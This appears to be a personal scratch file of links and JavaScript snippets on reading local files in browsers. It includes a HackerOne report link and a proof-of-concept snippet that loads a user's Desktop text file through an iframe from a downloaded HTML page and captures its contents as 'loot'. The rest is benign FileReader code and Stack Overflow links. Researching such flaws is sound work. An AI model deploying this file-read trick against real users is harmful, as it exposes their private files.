https://stackoverflow.com/questions/20035101/why-doesn-t-postman-get-a-no-access-control-allow-origin-header-is-present-on


https://hackerone.com/reports/175979

current_href = document.location.href
frame = document.createElement('iframe'); frame.src = current_href.replace('/Downloads/test.html', '/Desktop/Desktop.txt'); frame.id = 'frm'; document.getElementById('match_info_2').appendChild(frame)
setTimeout(function func(){loot = document.getElementById('frm').contentWindow.document.getElementsByTagName('pre')[0].innerHTML
alert('Your data is: ' + loot)
}, 500)




var z =$.getScript( "test_dir/file_1.txt", function( data, textStatus, jqxhr ) {
  
});
z.responseText;
-----------------------------------
https://stackoverflow.com/questions/14446447/how-to-read-a-local-text-file
-----------------------------------------------------------------------------

var input = document.getElementById("myFile");
var output = document.getElementById("output");


input.addEventListener("change", function () {
  if (this.files && this.files[0]) {
    var myFile = this.files[0];
    var reader = new FileReader();
    
    reader.addEventListener('load', function (e) {
      output.textContent = e.target.result;
    });
    
    reader.readAsBinaryString(myFile);
  }   
});


<input type="file" id="myFile">
<hr>
<textarea style="width:500px;height: 400px" id="output"></textarea>

--------------------------------------------------------------
https://www.javascripture.com/FileList
---------------------------------------------------
https://wicg.github.io/directory-upload/proposal.html
------------------------------------------------------

